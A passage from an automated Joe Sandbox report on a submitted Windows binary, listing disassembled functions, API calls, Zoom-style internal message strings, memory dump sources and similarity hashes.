                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.getsupportcountryinfo.request
                • API String ID: 3166440930-535446586
                • Opcode ID: 17cba80d372adc081639578311093a2996436653004a4c4361e9d37c0219bd90
                • Instruction ID: 04bb1aad923f439c50e80d18ee060433d246fd1c95319cce820d28944654c9ef
                • Opcode Fuzzy Hash: 17cba80d372adc081639578311093a2996436653004a4c4361e9d37c0219bd90
                • Instruction Fuzzy Hash: EFE0D8B0A003C067D710BB559C85B1F66B4A750716F50446CB3059B3D2CBF44984C7B5
                Function 00C76880 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76887
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.ps.pt_request_active_app_ex,00013896,recording_type,00000004), ref: 00C768A2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.ps.pt_request_active_app_ex$recording_type
                • API String ID: 4281283084-3344903612
                • Opcode ID: abe498bd24e4f411af7f46e3d3a08670e158c42179ceac1d293097cce2b6ad96
                • Instruction ID: 0404982c8bcdfad053f3ff3f8e457667ba62b77b04705c3bfe01c6ae9b9470d3
                • Opcode Fuzzy Hash: abe498bd24e4f411af7f46e3d3a08670e158c42179ceac1d293097cce2b6ad96
                • Instruction Fuzzy Hash: 7EE0D8F1A0479057C730BB154C4975E66A49B8471AF50456CB1065F3C2CBF44940DF75
                Function 00C6C890 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C897
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.exit.process.request,00009D08,ProcessID,00000004), ref: 00C6C8B2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ProcessID$com.zoom.app.assistant.exit.process.request
                • API String ID: 4281283084-3478587648
                • Opcode ID: 71c65b332e4e5cc338c218ccd87a9da4ef57922d0a0cf714d7d1c26ce24dc244
                • Instruction ID: d11c13e60cf48616957da1c23e00b70c27cfbe71ce0c378b388bf3c5b0b12e76
                • Opcode Fuzzy Hash: 71c65b332e4e5cc338c218ccd87a9da4ef57922d0a0cf714d7d1c26ce24dc244
                • Instruction Fuzzy Hash: 7CE0D8B0A5038097C7307B144C5575E77A4AF90716F50046DB1415B3D2CBF84844EB75
                Function 00C6E8B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E8B7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unload.service.response,00009DD3,result,00000004), ref: 00C6E8D2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.unload.service.response$result
                • API String ID: 4281283084-1385566299
                • Opcode ID: e17f0ae16d38b5db65d845525248bbcf1daa1f7961c6af22d311e86ad06f0281
                • Instruction ID: 383f73060b074310993de9e989b07c73a5e505004dd9b390bddb757bea02f94f
                • Opcode Fuzzy Hash: e17f0ae16d38b5db65d845525248bbcf1daa1f7961c6af22d311e86ad06f0281
                • Instruction Fuzzy Hash: 45E0D87194078067DB10BF159C45B1EA2A4A74475DF44442DB2045F3D2CFF40904EB78
                Function 00C70840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70847
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.log.stopchannel,00009DA0,ChannelId,00000004), ref: 00C70862
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ChannelId$com.zoom.app.log.stopchannel
                • API String ID: 4281283084-1630933032
                • Opcode ID: 8ff2ba74daec59b896763f8598adc5c4c4ef50ca1794ea8d959c9496b156e4bf
                • Instruction ID: 8bf3717fc90f1fc7c5669df839df851a6d9584183f7aa4cf4c1b57b47a451b19
                • Opcode Fuzzy Hash: 8ff2ba74daec59b896763f8598adc5c4c4ef50ca1794ea8d959c9496b156e4bf
                • Instruction Fuzzy Hash: 94E0D8B0A44380E7C7207B15CC4571E77B4AB40716F508419B1455B3D2CBF54848DFB5
                Function 00C68850 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68857
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.termConf,0000271F,Reason,00000004), ref: 00C68872
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Reason$com.Zoom.app.pt.termConf
                • API String ID: 3166440930-4274150399
                • Opcode ID: b11c10a6944a60efb659414fd70171c18cb2baf7d3cb2e8d3a69f3d4f7aceeb5
                • Instruction ID: 98e04afe1db2c28f41b7b503ed2c9594d15bdc7ae2dc49ae225fb0380ef5f518
                • Opcode Fuzzy Hash: b11c10a6944a60efb659414fd70171c18cb2baf7d3cb2e8d3a69f3d4f7aceeb5
                • Instruction Fuzzy Hash: 1DE0D8B0A043C097C7206B149C89B1E66A4BB5475BF40092CB6015F3D6CBF44844C774
                Function 00C6E850 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E857
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unload.service.request,00009DD2,roomName,00000004), ref: 00C6E872
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.unload.service.request$roomName
                • API String ID: 3166440930-350828089
                • Opcode ID: 95f9f8fba051d47fea8de971cc073465d2ca99cd0d7fe25b6448fc65f78a014d
                • Instruction ID: 9445059535001214cfcb86a22d09f490a420f547b636901e4eb8df9b3472df14
                • Opcode Fuzzy Hash: 95f9f8fba051d47fea8de971cc073465d2ca99cd0d7fe25b6448fc65f78a014d
                • Instruction Fuzzy Hash: 18E0D8B4A003C0B7D7207B154C85B1E66B49B94B16F504519B6115F3D2CBF48884D778
                Function 00C72870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72877
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.cancelinvitebyphone.request,00009E86,JsCallID,00000004), ref: 00C72892
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
